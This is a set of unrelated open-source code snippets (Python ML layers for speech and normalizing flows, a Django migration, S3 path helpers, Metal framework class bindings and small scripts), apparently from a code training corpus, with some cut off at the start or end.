kxblock=(T_x,0),kyblock=(T_y,0), pxblock=(P_x,0),pyblock=(P_y,0), ) basis_op=spinful_fermion_basis_general(N_2d, make_basis=True, Nf=Nf, kxblock=(T_x,0),kyblock=(T_y,0), pxblock=(P_x,0),pyblock=(P_y,0), ) compare(static_list_spfs,basis,basis_op) print('passed spinful fermios')
StarcoderdataPython
9697800
s = str(input('Qual é o seu sexo? [M/F] ')).strip().upper()[0] # [0] só pega a primeira letra while s not in 'FM': s = str(input('Sexo inválido! Digite novamente: [M/F] ')).strip().upper()[0] print('Sexo {} registrado com sucesso!'.format(s))
StarcoderdataPython
5029368
<filename>fine-tune/model/layers.py<gh_stars>100-1000 import torch from torch.autograd import Variable from torch import nn from torch.nn import functional as F from .basic_layers import sort_batch, ConvNorm, LinearNorm, Attention, tile from .utils import get_mask_from_lengths from .beam import Beam, GNMTGlobalScorer class SpeakerClassifier(nn.Module): ''' - n layer CNN + PROJECTION ''' def __init__(self, hparams): super(SpeakerClassifier, self).__init__() convolutions = [] for i in range(hparams.SC_n_convolutions): #parse dim if i == 0: in_dim = hparams.encoder_embedding_dim out_dim = hparams.SC_hidden_dim elif i == (hparams.SC_n_convolutions-1): in_dim = hparams.SC_hidden_dim out_dim = hparams.SC_hidden_dim conv_layer = nn.Sequential( ConvNorm(in_dim, out_dim, kernel_size=hparams.SC_kernel_size, stride=1, padding=int((hparams.SC_kernel_size - 1) / 2), dilation=1, w_init_gain='leaky_relu', param=0.2), nn.BatchNorm1d(out_dim), nn.LeakyReLU(0.2)) convolutions.append(conv_layer) self.convolutions = nn.ModuleList(convolutions) self.projection = LinearNorm(hparams.SC_hidden_dim, hparams.pretrain_n_speakers) self.projection_to_A = LinearNorm(hparams.SC_hidden_dim, 1, bias=False) def forward(self, x): # x [B, T, dim] # -> [B, DIM, T] hidden = x.transpose(1, 2) for conv in self.convolutions: hidden = conv(hidden) # -> [B, T, dim] hidden = hidden.transpose(1, 2) logits = self.projection_to_A(hidden) return logits class SpeakerEncoder(nn.Module): ''' - Simple 2 layer bidirectional LSTM with global mean_pooling ''' def __init__(self, hparams): super(SpeakerEncoder, self).__init__() self.lstm = nn.LSTM(hparams.n_mel_channels, int(hparams.speaker_encoder_hidden_dim / 2), num_layers=2, batch_first=True, bidirectional=True, dropout=hparams.speaker_encoder_dropout) self.projection1 = LinearNorm(hparams.speaker_encoder_hidden_dim, hparams.speaker_embedding_dim, w_init_gain='tanh') self.projection2 = LinearNorm(hparams.speaker_embedding_dim, hparams.pretrain_n_speakers) def forward(self, x, input_lengths): ''' x [batch_size, mel_bins, T] return logits [batch_size, n_speakers] embeddings [batch_size, embedding_dim] ''' x = x.transpose(1,2) x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths) x = nn.utils.rnn.pack_padded_sequence( x_sorted, sorted_lengths.cpu().numpy(), batch_first=True) self.lstm.flatten_parameters() outputs, _ = self.lstm(x) outputs, _ = nn.utils.rnn.pad_packed_sequence( outputs, batch_first=True) outputs = torch.sum(outputs,dim=1) / sorted_lengths.unsqueeze(1).float() # mean pooling -> [batch_size, dim] outputs = F.tanh(self.projection1(outputs)) outputs = outputs[initial_index] # L2 normalizing # embeddings = outputs / torch.norm(outputs, dim=1, keepdim=True) logits = self.projection2(outputs) return logits, embeddings def inference(self, x): x = x.transpose(1,2) self.lstm.flatten_parameters() outputs, _ = self.lstm(x) outputs = torch.sum(outputs,dim=1) / float(outputs.size(1)) # mean pooling -> [batch_size, dim] outputs = F.tanh(self.projection1(outputs)) embeddings = outputs / torch.norm(outputs, dim=1, keepdim=True) logits = self.projection2(outputs) pid = torch.argmax(logits, dim=1) return pid, embeddings class MergeNet(nn.Module): ''' one layer bi-lstm ''' def __init__(self, hparams): super(MergeNet, self).__init__() self.lstm = nn.LSTM(hparams.encoder_embedding_dim, int(hparams.encoder_embedding_dim/2), num_layers=1, batch_first=True, bidirectional=True) def forward(self, x, input_lengths): ''' x [B, T, dim] ''' x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths) x = nn.utils.rnn.pack_padded_sequence( x_sorted, sorted_lengths.cpu().numpy(), batch_first=True) self.lstm.flatten_parameters() outputs, _ = self.lstm(x) outputs, _ = nn.utils.rnn.pad_packed_sequence( outputs, batch_first=True) outputs = outputs[initial_index] return outputs def inference(self,x): self.lstm.flatten_parameters() outputs, _ = self.lstm(x) return outputs class AudioEncoder(nn.Module): ''' - Simple 2 layer bidirectional LSTM ''' def __init__(self, hparams): super(AudioEncoder, self).__init__() if hparams.spemb_input: input_dim = hparams.n_mel_channels + hparams.speaker_embedding_dim else: input_dim = hparams.n_mel_channels self.lstm1 = nn.LSTM(input_dim, int(hparams.audio_encoder_hidden_dim / 2), num_layers=1, batch_first=True, bidirectional=True) self.lstm2 = nn.LSTM(hparams.audio_encoder_hidden_dim*hparams.n_frames_per_step_encoder, int(hparams.audio_encoder_hidden_dim / 2), num_layers=1, batch_first=True, bidirectional=True) self.concat_hidden_dim = hparams.audio_encoder_hidden_dim*hparams.n_frames_per_step_encoder self.n_frames_per_step = hparams.n_frames_per_step_encoder def forward(self, x, input_lengths): ''' x [batch_size, mel_bins, T] return [batch_size, T, channels] ''' x = x.transpose(1, 2) x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths) x_packed = nn.utils.rnn.pack_padded_sequence( x_sorted, sorted_lengths.cpu().numpy(), batch_first=True) self.lstm1.flatten_parameters() outputs, _ = self.lstm1(x_packed) outputs, _ = nn.utils.rnn.pad_packed_sequence( outputs, batch_first=True, total_length=x.size(1)) # use total_length make sure the recovered sequence length not changed outputs = outputs.reshape(x.size(0), -1, self.concat_hidden_dim) output_lengths = torch.ceil(sorted_lengths.float() / self.n_frames_per_step).long() outputs = nn.utils.rnn.pack_padded_sequence( outputs, output_lengths.cpu().numpy() , batch_first=True) self.lstm2.flatten_parameters() outputs, _ = self.lstm2(outputs) outputs, _ = nn.utils.rnn.pad_packed_sequence( outputs, batch_first=True) return outputs[initial_index], output_lengths[initial_index] def inference(self, x): x = x.transpose(1, 2) self.lstm1.flatten_parameters() outputs, _ = self.lstm1(x) outputs = outputs.reshape(1, -1, self.concat_hidden_dim) self.lstm2.flatten_parameters() outputs, _ = self.lstm2(outputs) return outputs class AudioSeq2seq(nn.Module): ''' - Simple 2 layer bidirectional LSTM ''' def __init__(self, hparams): super(AudioSeq2seq, self).__init__() self.encoder = AudioEncoder(hparams) self.decoder_rnn_dim = hparams.encoder_embedding_dim self.attention_layer = Attention(self.decoder_rnn_dim, hparams.audio_encoder_hidden_dim, hparams.AE_attention_dim, hparams.AE_attention_location_n_filters, hparams.AE_attention_location_kernel_size) self.decoder_rnn = nn.LSTMCell(hparams.symbols_embedding_dim + hparams.audio_encoder_hidden_dim, self.decoder_rnn_dim) def _proj(activation): if activation is not None: return nn.Sequential(LinearNorm(self.decoder_rnn_dim+hparams.audio_encoder_hidden_dim, hparams.encoder_embedding_dim, w_init_gain=hparams.hidden_activation), activation) else: return LinearNorm(self.decoder_rnn_dim+hparams.audio_encoder_hidden_dim, hparams.encoder_embedding_dim, w_init_gain=hparams.hidden_activation) if hparams.hidden_activation == 'relu': self.project_to_hidden = _proj(nn.ReLU()) elif hparams.hidden_activation == 'tanh': self.project_to_hidden = _proj(nn.Tanh()) elif hparams.hidden_activation == 'linear': self.project_to_hidden = _proj(None) else: print('Must be relu, tanh or linear.') assert False self.project_to_n_symbols= LinearNorm(hparams.encoder_embedding_dim, hparams.n_symbols + 1) # plus the <eos> self.eos = hparams.n_symbols self.activation = hparams.hidden_activation self.max_len = 100 def initialize_decoder_states(self, memory, mask): B = memory.size(0) MAX_TIME = memory.size(1) self.decoder_hidden = Variable(memory.data.new( B, self.decoder_rnn_dim).zero_()) self.decoder_cell = Variable(memory.data.new( B, self.decoder_rnn_dim).zero_()) self.attention_weigths = Variable(memory.data.new( B, MAX_TIME).zero_()) self.attention_weigths_cum = Variable(memory.data.new( B, MAX_TIME).zero_()) self.attention_context = Variable(memory.data.new( B, self.decoder_rnn_dim).zero_()) self.memory = memory self.processed_memory = self.attention_layer.memory_layer(memory) self.mask = mask def map_states(self, fn): ''' mapping the decoder states using fn ''' self.decoder_hidden = fn(self.decoder_hidden, 0) self.decoder_cell = fn(self.decoder_cell, 0) self.attention_weigths = fn(self.attention_weigths, 0) self.attention_weigths_cum = fn(self.attention_weigths_cum, 0) self.attention_context = fn(self.attention_context, 0) def parse_decoder_outputs(self, hidden, logit, alignments): # -> [B, T_out + 1, max_time] alignments = torch.stack(alignments).transpose(0,1) # [T_out + 1, B, n_symbols] -> [B, T_out + 1, n_symbols] logit = torch.stack(logit).transpose(0, 1).contiguous() hidden = torch.stack(hidden).transpose(0, 1).contiguous() return hidden, logit, alignments def decode(self, decoder_input): cell_input = torch.cat((decoder_input, self.attention_context),-1) self.decoder_hidden, self.decoder_cell = self.decoder_rnn( cell_input, (self.decoder_hidden, self.decoder_cell)) attention_weigths_cat = torch.cat( (self.attention_weigths.unsqueeze(1), self.attention_weigths_cum.unsqueeze(1)),dim=1) self.attention_context, self.attention_weigths = self.attention_layer( self.decoder_hidden, self.memory, self.processed_memory, attention_weigths_cat, self.mask) self.attention_weigths_cum += self.attention_weigths hidden_and_context = torch.cat((self.decoder_hidden, self.attention_context), -1) hidden = self.project_to_hidden(hidden_and_context) # dropout to increasing g logit = self.project_to_n_symbols(F.dropout(hidden, 0.5, self.training)) return hidden, logit, self.attention_weigths def forward(self, mel, mel_lengths, decoder_inputs, start_embedding): ''' decoder_inputs: [B, channel, T] start_embedding [B, channel] return hidden_outputs [B, T+1, channel] logits_outputs [B, T+1, n_symbols] alignments [B, T+1, max_time] ''' memory, memory_lengths = self.encoder(mel, mel_lengths) decoder_inputs = decoder_inputs.permute(2, 0, 1) # -> [T, B, channel] decoder_inputs = torch.cat((start_embedding.unsqueeze(0), decoder_inputs), dim=0) self.initialize_decoder_states(memory, mask=~get_mask_from_lengths(memory_lengths)) hidden_outputs, logit_outputs, alignments = [], [], [] while len(hidden_outputs) < decoder_inputs.size(0): decoder_input = decoder_inputs[len(hidden_outputs)] hidden, logit, attention_weights = self.decode(decoder_input) hidden_outputs += [hidden] logit_outputs += [logit] alignments += [attention_weights] hidden_outputs, logit_outputs, alignments = \ self.parse_decoder_outputs( hidden_outputs, logit_outputs, alignments) return hidden_outputs, logit_outputs, alignments ''' use beam search ? ''' def inference_greed(self, x, start_embedding, embedding_table): ''' decoding the phone sequence using greed algorithm x [1, mel_bins, T] start_embedding [1,embedding_dim] embedding_table nn.Embedding class return hidden_outputs [1, ] ''' MAX_LEN = 100 decoder_input = start_embedding memory = self.encoder.inference(x) self.initialize_decoder_states(memory, mask=None) hidden_outputs, alignments, phone_ids = [], [], [] while True: hidden, logit, attention_weights = self.decode(decoder_input) hidden_outputs += [hidden] alignments += [attention_weights] phone_id = torch.argmax(logit,dim=1) phone_ids += [phone_id] # if reaches the <eos> if phone_id.squeeze().item() == self.eos: break if len(hidden_outputs) == self.max_len: break print('Warning! The decoded text reaches the maximum lengths.') # embedding the phone_id decoder_input = embedding_table(phone_id) # -> [1, embedding_dim] hidden_outputs, phone_ids, alignments = \ self.parse_decoder_outputs(hidden_outputs, phone_ids, alignments) return hidden_outputs, phone_ids, alignments def inference_beam(self, x, start_embedding, embedding_table, beam_width=20,): memory = self.encoder.inference(x).expand(beam_width, -1,-1) MAX_LEN = 100 n_best = 5 self.initialize_decoder_states(memory, mask=None) decoder_input = tile(start_embedding, beam_width) beam = Beam(beam_width, 0, self.eos, self.eos, n_best=n_best, cuda=True, global_scorer=GNMTGlobalScorer()) hidden_outputs, alignments, phone_ids = [], [], [] for step in range(MAX_LEN): if beam.done(): break hidden, logit, attention_weights = self.decode(decoder_input) logit = F.log_softmax(logit, dim=1) beam.advance(logit, attention_weights, hidden) select_indices = beam.get_current_origin() self.map_states(lambda state, dim: state.index_select(dim, select_indices)) decoder_input = embedding_table(beam.get_current_state()) scores, ks = beam.sort_finished(minimum=n_best) hyps, attn, hiddens = [], [], [] for i, (times, k) in enumerate(ks[:n_best]): hyp, att, hid = beam.get_hyp(times, k) hyps.append(hyp) attn.append(att) hiddens.append(hid) return hiddens[0].unsqueeze(0), hyps[0].unsqueeze(0), attn[0].unsqueeze(0) class TextEncoder(nn.Module): """Encoder module: - Three 1-d convolution banks - Bidirectional LSTM """ def __init__(self, hparams): super(TextEncoder, self).__init__() convolutions = [] for _ in range(hparams.encoder_n_convolutions): conv_layer = nn.Sequential( ConvNorm(hparams.encoder_embedding_dim, hparams.encoder_embedding_dim, kernel_size=hparams.encoder_kernel_size, stride=1, padding=int((hparams.encoder_kernel_size - 1) / 2), dilation=1, w_init_gain='relu'), nn.BatchNorm1d(hparams.encoder_embedding_dim)) convolutions.append(conv_layer) self.convolutions = nn.ModuleList(convolutions) self.lstm = nn.LSTM(hparams.encoder_embedding_dim, int(hparams.encoder_embedding_dim / 2), 1, batch_first=True, bidirectional=True) self.dropout = hparams.text_encoder_dropout def _proj(activation): if activation is not None: return nn.Sequential(LinearNorm(hparams.encoder_embedding_dim, hparams.encoder_embedding_dim, w_init_gain=hparams.hidden_activation), activation) else: return LinearNorm(hparams.encoder_embedding_dim, hparams.encoder_embedding_dim, w_init_gain=hparams.hidden_activation) if hparams.hidden_activation == 'relu': self.projection = _proj(nn.ReLU()) elif hparams.hidden_activation == 'tanh': self.projection = _proj(nn.Tanh()) elif hparams.hidden_activation == 'linear': self.projection = _proj(None) else: print('Must be relu, tanh or linear.') assert False #self.projection = nn.LinearNorm(hparams.encoder_embedding_dim, # hparams.encoder_embedding_dim, # w_init_gain='relu') # fusing bi-directional info def forward(self, x, input_lengths): ''' x: [batch_size, channel, T] return [batch_size, T, channel] ''' for conv in self.convolutions: x = F.dropout(F.relu(conv(x)), self.dropout, self.training) # -> [batch_size, T, channel] x = x.transpose(1, 2) x_sorted, sorted_lengths, initial_index = sort_batch(x, input_lengths) # pytorch tensor are not reversible, hence the conversion #input_lengths = input_lengths.cpu().numpy() sorted_lengths = sorted_lengths.cpu().numpy() x = nn.utils.rnn.pack_padded_sequence( x_sorted, sorted_lengths, batch_first=True) self.lstm.flatten_parameters() outputs, _ = self.lstm(x) outputs, _ = nn.utils.rnn.pad_packed_sequence( outputs, batch_first=True) outputs = self.projection(outputs) return outputs[initial_index] def inference(self, x): for conv in self.convolutions: x = F.dropout(F.relu(conv(x)), self.dropout, self.training) x = x.transpose(1, 2) self.lstm.flatten_parameters() outputs, _ = self.lstm(x) outputs = self.projection(outputs) return outputs class PostNet(nn.Module): """Postnet - Five 1-d convolution with 512 channels and kernel size 5 """ def __init__(self, hparams): super(PostNet, self).__init__() self.convolutions = nn.ModuleList() self.convolutions.append( nn.Sequential( ConvNorm(hparams.n_mel_channels, hparams.postnet_dim, kernel_size=hparams.postnet_kernel_size, stride=1, padding=int((hparams.postnet_kernel_size - 1) / 2), dilation=1, w_init_gain='tanh'), nn.BatchNorm1d(hparams.postnet_dim)) ) for i in range(1, hparams.postnet_n_convolutions - 1): self.convolutions.append( nn.Sequential( ConvNorm(hparams.postnet_dim, hparams.postnet_dim, kernel_size=hparams.postnet_kernel_size, stride=1, padding=int((hparams.postnet_kernel_size - 1) / 2), dilation=1, w_init_gain='tanh'), nn.BatchNorm1d(hparams.postnet_dim)) ) if hparams.predict_spectrogram: out_dim = hparams.n_spc_channels self.projection = LinearNorm(hparams.n_mel_channels, hparams.n_spc_channels, bias=False) else: out_dim = hparams.n_mel_channels self.convolutions.append( nn.Sequential( ConvNorm(hparams.postnet_dim, out_dim, kernel_size=hparams.postnet_kernel_size, stride=1, padding=int((hparams.postnet_kernel_size - 1) / 2), dilation=1, w_init_gain='linear'), nn.BatchNorm1d(out_dim)) ) self.dropout = hparams.postnet_dropout self.predict_spectrogram = hparams.predict_spectrogram def forward(self, input): # input [B, mel_bins, T] x = input for i in range(len(self.convolutions) - 1): x = F.dropout(torch.tanh(self.convolutions[i](x)), self.dropout, self.training) x = F.dropout(self.convolutions[-1](x), self.dropout, self.training) if self.predict_spectrogram: o = x + self.projection(input.transpose(1,2)).transpose(1,2) else: o = x + input return o
StarcoderdataPython
12818784
#!/usr/bin/env python import sys f1 = open(sys.argv[1]) f2 = open(sys.argv[2]) res = 0 for l1, l2 in zip(f1, f2): v1 = float(l1.strip()) v2 = float(l2.strip()) rel_diff = abs(v1 - v2) / abs(v1) if rel_diff > 10 ** -4: print "Difference: {} vs {}".format(v1, v2) res = 1 sys.exit(res)
StarcoderdataPython
11344288
<gh_stars>0 from timemachines.skaters.dlm.dlmunivariate import dlm_univariate_a, dlm_univariate_r3 from timemachines.skatertools.evaluation.evaluators import hospital_mean_square_error def test_dlm_auto_univariate(): print(hospital_mean_square_error(f=dlm_univariate_a, k=3, n=150, n_burn=44)) print(hospital_mean_square_error(f=dlm_univariate_r3, k=3, n=150, n_burn=44, r=0.53)) if __name__=='__main__': test_dlm_auto_univariate()
StarcoderdataPython
3285222
<filename>saliency/Saliency_other_models/models/SAM_RESNET/config.py ######################################################################### # MODEL PARAMETERS # ######################################################################### # version (0 for SAM-VGG and 1 for SAM-ResNet) version = 1 # batch size b_s = 1 # number of rows of input images shape_r = 240 # number of cols of input images shape_c = 320 # number of rows of downsampled maps shape_r_gt = 30 # number of cols of downsampled maps shape_c_gt = 40 # number of rows of model outputs shape_r_out = 480 # number of cols of model outputs shape_c_out = 640 # final upsampling factor upsampling_factor = 16 # number of epochs nb_epoch = 10 # number of timestep nb_timestep = 4 # number of learned priors nb_gaussian = 16 ######################################################################### # TRAINING SETTINGS # ######################################################################### # path of training images imgs_train_path = '/path/to/training/images/' # path of training maps maps_train_path = '/path/to/training/maps/' # path of training fixation maps fixs_train_path = '/path/to/training/fixation/maps/' # number of training images nb_imgs_train = 10000 # path of validation images imgs_val_path = '/path/to/validation/images/' # path of validation maps maps_val_path = '/path/to/validation/maps/' # path of validation fixation maps fixs_val_path = '/path/to/validation/fixation/maps/' # number of validation images nb_imgs_val = 5000
StarcoderdataPython
1767827
def find_bucket_key(s3_path): """ This is a helper function that given an s3 path such that the path is of the form: bucket/key It will return the bucket and the key represented by the s3 path """ s3_components = s3_path.split("/") bucket = s3_components[0] s3_key = "" if len(s3_components) > 1: s3_key = "/".join(s3_components[1:]) return bucket, s3_key def split_s3_bucket_key(s3_path): """Split s3 path into bucket and key prefix. This will also handle the s3:// prefix. :return: Tuple of ('bucketname', 'keyname') """ if s3_path.startswith("s3://"): s3_path = s3_path[5:] return find_bucket_key(s3_path)
StarcoderdataPython
5059767
''' Classes from the 'AGXMetalA10' framework. ''' try: from rubicon.objc import ObjCClass except ValueError: def ObjCClass(name): return None def _Class(name): try: return ObjCClass(name) except NameError: return None AGXA10FamilyIndirectRenderCommandEncoder = _Class('AGXA10FamilyIndirectRenderCommandEncoder') AGXA10FamilyComputeOrFragmentOrTileProgram = _Class('AGXA10FamilyComputeOrFragmentOrTileProgram') AGXA10FamilyComputeProgram = _Class('AGXA10FamilyComputeProgram') AGXA10FamilyFragmentProgram = _Class('AGXA10FamilyFragmentProgram') AGXA10FamilyVertexProgram = _Class('AGXA10FamilyVertexProgram') AGXA10FamilyWarpFunction = _Class('AGXA10FamilyWarpFunction') AGXA10FamilyResourceGroup = _Class('AGXA10FamilyResourceGroup') AGXMTLCounterSampleBuffer = _Class('AGXMTLCounterSampleBuffer') AGXA10FamilyIndirectComputeCommandEncoder = _Class('AGXA10FamilyIndirectComputeCommandEncoder') AGXTextureLayout = _Class('AGXTextureLayout') AGXA10FamilyDepthStencilState = _Class('AGXA10FamilyDepthStencilState') AGXA10FamilyRenderPipeline = _Class('AGXA10FamilyRenderPipeline') AGXA10FamilyComputePipeline = _Class('AGXA10FamilyComputePipeline') AGXA10FamilySampler = _Class('AGXA10FamilySampler') AGXA10FamilyIndirectRenderCommand = _Class('AGXA10FamilyIndirectRenderCommand') AGXA10FamilyFunctionHandle = _Class('AGXA10FamilyFunctionHandle') AGXA10FamilyRasterizationRateMap = _Class('AGXA10FamilyRasterizationRateMap') AGXA10FamilyIndirectArgumentBufferLayout = _Class('AGXA10FamilyIndirectArgumentBufferLayout') AGXA10FamilyIndirectComputeCommand = _Class('AGXA10FamilyIndirectComputeCommand') AGXPrincipalDevice = _Class('AGXPrincipalDevice') AGXA10FamilySparseHeap = _Class('AGXA10FamilySparseHeap') AGXA10FamilyHeap = _Class('AGXA10FamilyHeap') AGXA10FamilyCommandQueue = _Class('AGXA10FamilyCommandQueue') AGXA10FamilyThreadedRenderPass = _Class('AGXA10FamilyThreadedRenderPass') AGXA10FamilyDynamicLibrary = _Class('AGXA10FamilyDynamicLibrary') AGXA10FamilyBinaryArchive = _Class('AGXA10FamilyBinaryArchive') AGXA10FamilyIndirectArgumentEncoder = _Class('AGXA10FamilyIndirectArgumentEncoder') AGXA10FamilyCommandBuffer = _Class('AGXA10FamilyCommandBuffer') AGXA10FamilyResourceStateContext = _Class('AGXA10FamilyResourceStateContext') AGXA10FamilyRenderContext = _Class('AGXA10FamilyRenderContext') AGXA10FamilySampledRenderContext = _Class('AGXA10FamilySampledRenderContext') AGXA10FamilyComputeContext = _Class('AGXA10FamilyComputeContext') AGXA10FamilySampledComputeContext = _Class('AGXA10FamilySampledComputeContext') AGXA10FamilyBlitContext = _Class('AGXA10FamilyBlitContext') AGXA10FamilyDebugContext = _Class('AGXA10FamilyDebugContext') AGXTexture = _Class('AGXTexture') AGXA10FamilyTexture = _Class('AGXA10FamilyTexture') AGXA10FamilyIndirectCommandBuffer = _Class('AGXA10FamilyIndirectCommandBuffer') AGXBuffer = _Class('AGXBuffer') AGXA10FamilyVisibleFunctionTable = _Class('AGXA10FamilyVisibleFunctionTable') AGXA10FamilyBuffer = _Class('AGXA10FamilyBuffer') AGXA10FamilyDevice = _Class('AGXA10FamilyDevice') AGXA10XDevice = _Class('AGXA10XDevice') AGXA10Device = _Class('AGXA10Device')
StarcoderdataPython
9623295
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ] operations = [ migrations.CreateModel( name='OnedenAliment', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(max_length=250)), ('calories', models.DecimalField(max_digits=7, decimal_places=2)), ('proteins', models.DecimalField(max_digits=7, decimal_places=2)), ('fats', models.DecimalField(max_digits=7, decimal_places=2)), ('carbohydrates', models.DecimalField(max_digits=7, decimal_places=2)), ('fibres', models.DecimalField(max_digits=7, decimal_places=2)), ('unit_quantity', models.DecimalField(max_digits=7, decimal_places=2)), ('additional', models.TextField()), ], ), migrations.CreateModel( name='OnedenCategory', fields=[ ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)), ('name', models.CharField(max_length=100)), ], ), migrations.AddField( model_name='onedenaliment', name='category', field=models.ForeignKey(to='parsers.OnedenCategory'), ), migrations.AlterUniqueTogether( name='onedenaliment', unique_together=set([('category', 'name')]), ), ]
StarcoderdataPython
6495010
import torch import torch.nn as nn import torch.nn.functional as F from mflow.models.basic import GraphLinear, GraphConv, ActNorm, ActNorm2D # class AffineCoupling(nn.Module): # def __init__(self, in_channel, hidden_channels, affine=True): # filter_size=512, --> hidden_channels =(512, 512) # super(AffineCoupling, self).__init__() # # self.affine = affine # self.layers = nn.ModuleList() # self.norms = nn.ModuleList() # # self.norms_in = nn.ModuleList() # last_h = in_channel // 2 # if affine: # vh = tuple(hidden_channels) + (in_channel,) # else: # vh = tuple(hidden_channels) + (in_channel // 2,) # # for h in vh: # self.layers.append(nn.Conv2d(last_h, h, kernel_size=3, padding=1)) # self.norms.append(nn.BatchNorm2d(h)) #, momentum=0.9 may change norm later, where to use norm? for the residual? or the sum # # self.norms.append(ActNorm(in_channel=h, logdet=False)) # similar but not good # last_h = h # # def forward(self, input): # in_a, in_b = input.chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32) # # if self.affine: # # log_s, t = self.net(in_a).chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32) # s, t = self._s_t_function(in_a) # out_b = (in_b + t) * s # different affine bias , no difference to the log-det # (2,6,32,32) More stable, less error # # out_b = in_b * s + t # logdet = torch.sum(torch.log(torch.abs(s)).view(input.shape[0], -1), 1) # # else: # add coupling # # net_out = self.net(in_a) # _, t = self._s_t_function(in_a) # out_b = in_b + t # logdet = None # # return torch.cat([in_a, out_b], 1), logdet # # def reverse(self, output): # out_a, out_b = output.chunk(2, 1) # # if self.affine: # s, t = self._s_t_function(out_a) # in_b = out_b / s - t # More stable, less error s must not equal to 0!!! # # in_b = (out_b - t) / s # else: # _, t = self._s_t_function(out_a) # in_b = out_b - t # # return torch.cat([out_a, in_b], 1) # # def _s_t_function(self, x): # h = x # for i in range(len(self.layers)-1): # h = self.layers[i](h) # h = self.norms[i](h) # # h = torch.tanh(h) # tanh may be more stable? # h = torch.relu(h) # # h = self.layers[-1](h) # # s = None # if self.affine: # # residual net for doubling the channel. Do not use residual, unstable # log_s, t = h.chunk(2, 1) # # s = torch.sigmoid(log_s + 2) # (2,6,32,32) # s != 0 and t can be arbitrary : Why + 2??? more stable, keep s != 0!!! exp is not stable # s = torch.sigmoid(log_s) # works good when actnorm # # s = torch.tanh(log_s) # can not use tanh # # s = torch.sign(log_s) # lower reverse error if no actnorm, similar results when have actnorm # # else: # t = h # return s, t class AffineCoupling(nn.Module): # delete def __init__(self, in_channel, hidden_channels, affine=True, mask_swap=False): # filter_size=512, --> hidden_channels =(512, 512) super(AffineCoupling, self).__init__() self.affine = affine self.layers = nn.ModuleList() self.norms = nn.ModuleList() self.mask_swap=mask_swap # self.norms_in = nn.ModuleList() last_h = in_channel // 2 if affine: vh = tuple(hidden_channels) + (in_channel,) else: vh = tuple(hidden_channels) + (in_channel // 2,) for h in vh: self.layers.append(nn.Conv2d(last_h, h, kernel_size=3, padding=1)) self.norms.append(nn.BatchNorm2d(h)) # , momentum=0.9 may change norm later, where to use norm? for the residual? or the sum # self.norms.append(ActNorm(in_channel=h, logdet=False)) # similar but not good last_h = h def forward(self, input): in_a, in_b = input.chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32) if self.mask_swap: in_a, in_b = in_b, in_a if self.affine: # log_s, t = self.net(in_a).chunk(2, 1) # (2,12,32,32) --> (2,6,32,32), (2,6,32,32) s, t = self._s_t_function(in_a) out_b = (in_b + t) * s # different affine bias , no difference to the log-det # (2,6,32,32) More stable, less error # out_b = in_b * s + t logdet = torch.sum(torch.log(torch.abs(s)).view(input.shape[0], -1), 1) else: # add coupling # net_out = self.net(in_a) _, t = self._s_t_function(in_a) out_b = in_b + t logdet = None if self.mask_swap: result = torch.cat([out_b, in_a], 1) else: result = torch.cat([in_a, out_b], 1) return result, logdet def reverse(self, output): out_a, out_b = output.chunk(2, 1) if self.mask_swap: out_a, out_b = out_b, out_a if self.affine: s, t = self._s_t_function(out_a) in_b = out_b / s - t # More stable, less error s must not equal to 0!!! # in_b = (out_b - t) / s else: _, t = self._s_t_function(out_a) in_b = out_b - t if self.mask_swap: result = torch.cat([in_b, out_a], 1) else: result = torch.cat([out_a, in_b], 1) return result def _s_t_function(self, x): h = x for i in range(len(self.layers)-1): h = self.layers[i](h) h = self.norms[i](h) # h = torch.tanh(h) # tanh may be more stable? h = torch.relu(h) # h = self.layers[-1](h) s = None if self.affine: # residual net for doubling the channel. Do not use residual, unstable log_s, t = h.chunk(2, 1) # s = torch.sigmoid(log_s + 2) # (2,6,32,32) # s != 0 and t can be arbitrary : Why + 2??? more stable, keep s != 0!!! exp is not stable s = torch.sigmoid(log_s) # works good when actnorm # s = torch.tanh(log_s) # can not use tanh # s = torch.sign(log_s) # lower reverse error if no actnorm, similar results when have actnorm else: t = h return s, t class GraphAffineCoupling(nn.Module): def __init__(self, n_node, in_dim, hidden_dim_dict, masked_row, affine=True): super(GraphAffineCoupling, self).__init__() self.n_node = n_node self.in_dim = in_dim self.hidden_dim_dict = hidden_dim_dict self.masked_row = masked_row self.affine = affine self.hidden_dim_gnn = hidden_dim_dict['gnn'] self.hidden_dim_linear = hidden_dim_dict['linear'] self.net = nn.ModuleList() self.norm = nn.ModuleList() last_dim = in_dim for out_dim in self.hidden_dim_gnn: # What if use only one gnn??? self.net.append(GraphConv(last_dim, out_dim)) self.norm.append(nn.BatchNorm1d(n_node)) # , momentum=0.9 Change norm!!! # self.norm.append(ActNorm2D(in_dim=n_node, logdet=False)) last_dim = out_dim self.net_lin = nn.ModuleList() self.norm_lin = nn.ModuleList() for out_dim in self.hidden_dim_linear: # What if use only one gnn??? self.net_lin.append(GraphLinear(last_dim, out_dim)) self.norm_lin.append(nn.BatchNorm1d(n_node)) # , momentum=0.9 Change norm!!! # self.norm_lin.append(ActNorm2D(in_dim=n_node, logdet=False)) last_dim = out_dim if affine: self.net_lin.append(GraphLinear(last_dim, in_dim*2)) else: self.net_lin.append(GraphLinear(last_dim, in_dim)) self.scale = nn.Parameter(torch.zeros(1)) # nn.Parameter(torch.ones(1)) # mask = torch.ones(n_node, in_dim) mask[masked_row, :] = 0 # masked_row are kept same, and used for _s_t for updating the left rows self.register_buffer('mask', mask) def forward(self, adj, input): masked_x = self.mask * input s, t = self._s_t_function(adj, masked_x) # s must not equal to 0!!! if self.affine: out = masked_x + (1-self.mask) * (input + t) * s # out = masked_x + (1-self.mask) * (input * s + t) logdet = torch.sum(torch.log(torch.abs(s)).view(input.shape[0], -1), 1) # possibly wrong answer else: # add coupling out = masked_x + t*(1-self.mask) logdet = None return out, logdet def reverse(self, adj, output): masked_y = self.mask * output s, t = self._s_t_function(adj, masked_y) if self.affine: input = masked_y + (1 - self.mask) * (output / s 